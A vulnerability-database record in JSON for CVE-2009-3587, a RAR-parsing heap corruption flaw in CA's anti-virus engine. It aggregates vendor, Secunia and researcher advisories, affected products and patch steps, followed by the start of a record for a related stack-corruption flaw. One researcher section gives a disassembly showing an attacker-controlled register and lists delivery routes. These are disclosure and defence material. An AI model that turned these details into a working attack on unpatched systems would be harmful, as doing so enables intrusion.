"cpe22Uri": "cpe:/a:ca:internet_security_suite_plus_2009",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:network_and_systems_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:protection_suites",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:threat_manager_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:threat_manager_total_defense",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_ez_antivirus",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thierry Zoller",
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
}
],
"trust": 1.0
},
"cve": "CVE-2009-3587",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2009-3587",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-41033",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-3587",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2009-3587",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200910-199",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-41033",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted RAR archive file that triggers heap corruption, a different vulnerability than CVE-2009-3588. This vulnerability CVE-2009-3588 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) Could be put into a state or execute arbitrary code. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. \nAn attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. \nThe issues affect the Anti-Virus engine with versions prior to \u0027arclib\u0027 8.1.4.0. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. \nCA20091008-01: Security Notice for CA Anti-Virus Engine\n\n\nIssued: October 8, 2009\n\n\nCA\u0027s support is alerting customers to multiple security risks \nassociated with CA Anti-Virus Engine. Vulnerabilities exist in \nthe arclib component that can allow a remote attacker to cause a \ndenial of service, or to cause heap corruption and potentially \nfurther compromise a system. CA has issued fixes to address the \nvulnerabilities. An attacker can create a \nmalformed RAR archive file that results in heap corruption and \nallows the attacker to cause a denial of service or possibly \nfurther compromise the system. An attacker can create a \nmalformed RAR archive file that results in stack corruption and \nallows the attacker to cause a denial of service. \n\n\nRisk Rating\n\nMedium\n\n\nPlatform\n\nWindows\nUNIX\nLinux\nSolaris\nMac OS X\nNetware\n\n\nAffected Products\n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1\nCA Anti-Virus 2007 (v8)\nCA Anti-Virus 2008\nCA Anti-Virus 2009\nCA Anti-Virus Plus 2009\neTrust EZ Antivirus r7.1\nCA Internet Security Suite 2007 (v3)\nCA Internet Security Suite 2008\nCA Internet Security Suite Plus 2008\nCA Internet Security Suite Plus 2009\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) 8.1\nCA Threat Manager Total Defense\nCA Gateway Security r8.1\nCA Protection Suites r2\nCA Protection Suites r3\nCA Protection Suites r3.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 1.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 8.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.1\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11.1\nCA ARCserve Backup r11.5 on Windows\nCA ARCserve Backup r12 on Windows\nCA ARCserve Backup r12.0 SP1 on Windows\nCA ARCserve Backup r12.0 SP 2 on Windows\nCA ARCserve Backup r12.5 on Windows\nCA ARCserve Backup r11.1 Linux\nCA ARCserve Backup r11.5 Linux\nCA ARCserve for Windows Client Agent\nCA ARCserve for Windows Server component\nCA eTrust Intrusion Detection 2.0 SP1\nCA eTrust Intrusion Detection 3.0\nCA eTrust Intrusion Detection 3.0 SP1\nCA Common Services (CCS) r3.1\nCA Common Services (CCS) r11\nCA Common Services (CCS) r11.1\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1\n\n\nNon-Affected Products\n\nCA Anti-Virus engine with arclib version 8.1.4.0 or later \ninstalled\n\n\nHow to determine if the installation is affected\n\nFor products on Windows:\n\n1. Using Windows Explorer, locate the file \"arclib.dll\". By \n default, the file is located in the \n \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" directory (*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is earlier than indicated below, the \n installation is vulnerable. \n\n File Name File Version\n arclib.dll 8.1.4.0\n\n*For eTrust Intrusion Detection 2.0, the file is located in \n\"Program Files\\eTrust\\Intrusion Detection\\Common\", and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\"Program Files\\CA\\Intrusion Detection\\Common\". \n\nFor CA Anti-Virus r8.1 on non-Windows platforms:\n\nUse the compver utility provided on the CD to determine the \nversion of Arclib. If the version is less than 8.1.4.0, the \ninstallation is vulnerable. \n\nExample compver utility output:\n\n ------------------------------------------------\n COMPONENT NAME VERSION\n ------------------------------------------------\n eTrust Antivirus Arclib Archive Library 8.1.4.0\n ... (followed by other components)\n \n\nFor reference, the following are file names for arclib on \nnon-Windows operating systems:\n\n Operating System File name\n Solaris libarclib.so\n Linux libarclib.so\n Mac OS X arclib.bundle\n\n\nSolution\n\nCA released arclib 8.1.4.0 on August 12 2009. If your product is \nconfigured for automatic updates, you should already be protected, \nand you need to take no action. If your product is not configured \nfor automatic updates, then you simply need to run the update \nutility included with your product. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.0: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.1: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11.1: apply fix # RO11964. \n\nCA Common Services (CCS) r3.1: apply fix # RO11954. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \n32bit: apply fix # RO10663. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nIA64: apply fix # RO10664. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nAMD64: apply fix # RO10665. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr1.1: apply fix # RO10999. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr8.0: apply fix # RO10999. \n\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: \napply fix # RO11000. \n\nCA Gateway Security r8.1: RO10999. \n\nCA ARCserve for Windows Server component installed on a 64 bit \nmachine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 \n(AMD64). \n\nCA ARCserve for Windows Server component installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Windows Client Agent installed on a 64 bit \nmachine: apply fix # RO10664 (IA64) or RO10665 (AMD64). \n\nCA ARCserve for Windows Client Agent installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Linux Server r11.5: apply fix # RO10729. \n\nCA ARCserve for Linux:\n\n1. Download RO10729.tar.Z from RO10729 into a temporary location \n /tmp/RO10729\n\n2. Uncompress and untar RO10729.tar.Z as follows:\n uncompress RO10729.tar.Z\n tar -xvf RO10729.tar\n The new \"libarclib.so\" will be extracted to /tmp/RO10729\n\n3. Change the directory to $CAIGLBL0000/ino/config as follows:\n cd $CAIGLBL0000/ino/config\n\n4. Rename \"libarclib.so\" to \"libarclib.so.RO10729\" as follows:\n mv libarclib.so libarclib.so.RO10729\n\n5. Copy the new libarclib.so as follows:\n cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/\n\n6. chmod +x $CAIGLBL0000/ino/config/libarclib.so\n\n7. Stop the common agent (caagent stop)\n\n8. Change the directory to ARCserve common agent directory \n (typically /opt/CA/BABcmagt)\n cd /opt/CA/BABcmagt\n Note: To find out the agent home directory run the following \n command:\n dirname \u0027ls -l /usr/bin/caagent |cut -f2 -d\"\u003e\"\u0027\n\n9. Save a copy of libarclib.so\n cp -p libarclib.so libarclib.so.RO10729\n\n10. Copy over the new libarclib.so as follows:\n cp $/tmp/RO10729/libarclib.so. \n\n11. Start the common agent (caagent start)\n\n12. Repeat steps (7-11) on all remote Linux client agents\u0027 \n installations. \n\n13. rm -rf /tmp/RO10729\n\n\nWorkaround\n\nDo not open email attachments or download files from untrusted \nsources. \n\n\nIf additional information is required, please contact CA Support \nat http://support.ca.com/. \n\n\nIf you discover a vulnerability in CA products, please report your \nfindings to the CA Product Vulnerability Response Team. \nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams, Director ; 0xE2941985\nCA Product Vulnerability Response Team\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Anti-Virus Engine RAR Processing Two Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA36976\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36976/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in multiple CA products, which\ncan be exploited by malicious people to cause a DoS (Denial of\nService) or to potentially compromise a vulnerable system. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nPlease see the vendor\u0027s advisory for detailed instructions on\napplying patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Thierry Zoller. \n\nORIGINAL ADVISORY:\nCA20091008-01:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Background\n~~~~~~~~~~~~~\nQuote: \n\"CA is one of the world\u0027s largest IT management software providers. \nWe serve more than 99% of Fortune 1000 companies, as well as government \nentities, educational institutions and thousands of other companies \nin diverse industries worldwide\" \n\n\"CA Anti-Virus for the Enterprise is the next generation in comprehensive \nanti-virus security for business PCs, servers and PDAs. It combines \nproactive protection against malware with new, powerful management \nfeatures that stop and remove malicious code before it enters your \nnetwork, reducing system downtime\"\n\n\nII. \n\nAttacker has control over EBX :\n\nBasic Block:\n 6e4305b0 mov cl,byte ptr [ebx]\n Tainted Input Operands: ebx\n 6e4305b2 add edi,28h\n 6e4305b5 push edi\n 6e4305b6 lea edx,[esp+14h]\n 6e4305ba mov byte ptr [esp+14h],cl\n Tainted Input Operands: cl\n 6e4305be inc ebx\n Tainted Input Operands: ebx\n 6e4305bf push edx\n 6e4305c0 mov ecx,esi\n 6e4305c2 mov dword ptr [esp+1ch],ebx\n Tainted Input Operands: ebx\n 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)\n \n \n\nIII. \nDue to the nature of Anti-virus products, the attack vectors can be near endless. An attack\ncould be done over the way of an E-mail message carrying an RAR attachment (of a file\nrecognised as being RAR), USB, CD, Network data etc. \n\nPlease note that this is a general problem and not exclusive to Computer Associates. \n\n\nIV. Disclosure timeline\n~~~~~~~~~~~~~~~~~~~~~~~~~\nDD.MM.YYYY\n11.05.2009 - Reported CVE-2009-3587 \n03.06.2009 - Reported CVE-2009-3588\n09.10.2009 - CA releases advisory\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n13.10.2009 - G-SEC releases advisory\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3587"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-3587",
"trust": 3.0
},
{
"db": "BID",
"id": "36653",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "36976",
"trust": 2.6
},
{
"db": "OSVDB",
"id": "58691",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2009-2852",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1022999",
"trust": 2.5
},
{
"db": "XF",
"id": "53697",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "81918",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "81986",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-41033",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81885",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"id": "VAR-200910-0352",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T20:51:11.238000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "218878",
"trust": 0.8,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/36653"
},
{
"trust": 2.5,
"url": "http://osvdb.org/58691"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1022999"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/36976"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2009/2852"
},
{
"trust": 2.2,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=218878"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/507068/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53697"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3587"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/53697"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3587"
},
{
"trust": 0.4,
"url": "http://blog.g-sec.lu/2009/10/computer-associates-multiple-products.html"
},
{
"trust": 0.4,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/507101"
},
{
"trust": 0.3,
"url": "/archive/1/507068"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3588"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3587"
},
{
"trust": 0.1,
"url": "http://support.ca.com/."
},
{
"trust": 0.1,
"url": "https://www.g-sec.lu"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/36976/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-41033"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-10-13T00:00:00",
"db": "VULHUB",
"id": "VHN-41033"
},
{
"date": "2009-10-09T00:00:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"date": "2009-10-12T20:41:50",
"db": "PACKETSTORM",
"id": "81918"
},
{
"date": "2009-10-12T11:21:41",
"db": "PACKETSTORM",
"id": "81885"
},
{
"date": "2009-10-14T23:09:22",
"db": "PACKETSTORM",
"id": "81986"
},
{
"date": "2009-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"date": "2009-10-13T10:30:00.610000",
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-11-15T00:00:00",
"db": "VULHUB",
"id": "VHN-41033"
},
{
"date": "2009-10-13T15:38:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Product Anti-Virus In the engine arclib Vulnerability in arbitrary code execution in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
}
],
"trust": 0.6
}
}
VAR-200910-0097
Vulnerability from variot - Updated: 2025-04-10 20:18Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service via a crafted RAR archive file that triggers stack corruption, a different vulnerability than CVE-2009-3587. This vulnerability CVE-2009-3587 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) There is a possibility of being put into a state. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. An attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. The issues affect the Anti-Virus engine with versions prior to 'arclib' 8.1.4.0. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA20091008-01: Security Notice for CA Anti-Virus Engine
Issued: October 8, 2009
CA's support is alerting customers to multiple security risks associated with CA Anti-Virus Engine. Vulnerabilities exist in the arclib component that can allow a remote attacker to cause a denial of service, or to cause heap corruption and potentially further compromise a system. CA has issued fixes to address the vulnerabilities. An attacker can create a malformed RAR archive file that results in heap corruption and allows the attacker to cause a denial of service or possibly further compromise the system. An attacker can create a malformed RAR archive file that results in stack corruption and allows the attacker to cause a denial of service.
Risk Rating
Medium
Platform
Windows UNIX Linux Solaris Mac OS X Netware
Affected Products
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1 CA Anti-Virus 2007 (v8) CA Anti-Virus 2008 CA Anti-Virus 2009 CA Anti-Virus Plus 2009 eTrust EZ Antivirus r7.1 CA Internet Security Suite 2007 (v3) CA Internet Security Suite 2008 CA Internet Security Suite Plus 2008 CA Internet Security Suite Plus 2009 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) 8.1 CA Threat Manager Total Defense CA Gateway Security r8.1 CA Protection Suites r2 CA Protection Suites r3 CA Protection Suites r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1 CA ARCserve Backup r11.5 on Windows CA ARCserve Backup r12 on Windows CA ARCserve Backup r12.0 SP1 on Windows CA ARCserve Backup r12.0 SP 2 on Windows CA ARCserve Backup r12.5 on Windows CA ARCserve Backup r11.1 Linux CA ARCserve Backup r11.5 Linux CA ARCserve for Windows Client Agent CA ARCserve for Windows Server component CA eTrust Intrusion Detection 2.0 SP1 CA eTrust Intrusion Detection 3.0 CA eTrust Intrusion Detection 3.0 SP1 CA Common Services (CCS) r3.1 CA Common Services (CCS) r11 CA Common Services (CCS) r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
Non-Affected Products
CA Anti-Virus engine with arclib version 8.1.4.0 or later installed
How to determine if the installation is affected
For products on Windows:
- Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
- Right click on the file and select Properties.
- Select the Version tab.
-
If the file version is earlier than indicated below, the installation is vulnerable.
File Name File Version arclib.dll 8.1.4.0
*For eTrust Intrusion Detection 2.0, the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common".
For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 8.1.4.0, the installation is vulnerable.
Example compver utility output:
------------------------------------------------
COMPONENT NAME VERSION
------------------------------------------------
eTrust Antivirus Arclib Archive Library 8.1.4.0
... (followed by other components)
For reference, the following are file names for arclib on non-Windows operating systems:
Operating System File name
Solaris libarclib.so
Linux libarclib.so
Mac OS X arclib.bundle
Solution
CA released arclib 8.1.4.0 on August 12 2009. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11: apply fix # RO11964.
